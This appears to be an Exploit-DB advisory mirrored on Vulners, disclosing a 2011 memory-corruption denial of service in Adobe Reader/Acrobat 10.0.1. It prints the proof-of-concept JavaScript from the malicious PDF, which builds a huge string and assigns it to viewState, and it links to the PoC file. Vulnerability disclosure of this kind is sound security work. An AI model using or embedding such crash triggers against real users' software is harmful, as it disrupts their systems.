Lucene search
K

Adobe Reader/Acrobat 10.0.1 - Denial of Service

🗓️ 16 Jun 2011 00:00:00Reported by Soroush DaliliType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Adobe Reader/Acrobat 10.0.1 Denial of Service vulnerability found and reported on 24th Feb 201

Code
Title: [Adobe Reader/Acrobat Memory Corruption Denial of Service]
Report to Vendor: 24 Feb 2011
Application Name: [Adobe Reader/Acrobat]
Version: [10.0.1, other versions can be vulnerable before applying the 14 June 2011 Patch]
Reference(s): [
- http://secunia.com/advisories/43269/
]
Finder(s): [
- Soroush Dalili (Irsdl [at] yahoo [dot] com) - www.SecProject.com
]
PoC: Tested on Windows 7 SP1 and Windows XP SP3

PoC Details:
The following JS was the problem point inside the PDF file (Open the PoC file by a text editor):
/*****************************************************************************/
		var temp;
		for(var i=0;i<=8;i++)
		{
			temp+=temp+temp+"A";
		}
		var result = temp;
		try{
			viewState= result;
		}catch(e){}
		dirty; // Important!
/*****************************************************************************/

PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17405.pdf

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation